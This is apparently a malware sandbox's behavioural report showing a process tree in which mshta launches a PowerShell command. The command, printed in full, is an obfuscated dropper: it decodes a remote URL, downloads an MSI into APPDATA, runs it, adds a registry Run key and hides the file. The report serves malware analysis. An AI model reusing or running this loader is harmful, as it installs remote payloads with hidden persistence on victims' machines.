| ZeroBOX

Behavioral Analysis

Process tree

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\es.hta

    1460
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $AgMxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,4306,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,4249,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP @(4270,4273,4267,4287,4293,4265,4283,4280,4280,4267,4276,4282,4293,4283,4281,4267,4280,4290,4281,4309,4300,4314,4317,4295,4312,4299,4290,4275,4303,4297,4312,4309,4313,4309,4300,4314,4290,4285,4303,4308,4298,4309,4317,4313,4290,4265,4315,4312,4312,4299,4308,4314,4284,4299,4312,4313,4303,4309,4308,4290,4280,4315,4308)), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH.Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};function CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUkG=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)};return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQtta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,4253,4298,4249,4255,4254,4252,4252,4251,4254,4295,4300,4250,4251,4247,4297,4255,4298,4251,4248,4296,4296,4255,4300,4250,4254,4248,4296,4249,4299,4248,4298,4244,4312,4248,4244,4298,4299,4316,4245,4277,4276,4270,4279,4276,4270,4268,4282,4244,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PNjTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa $iEiUK;;;;}paTeG;

      2092

Process contents

No process loaded Click on a process in the tree above to load its data.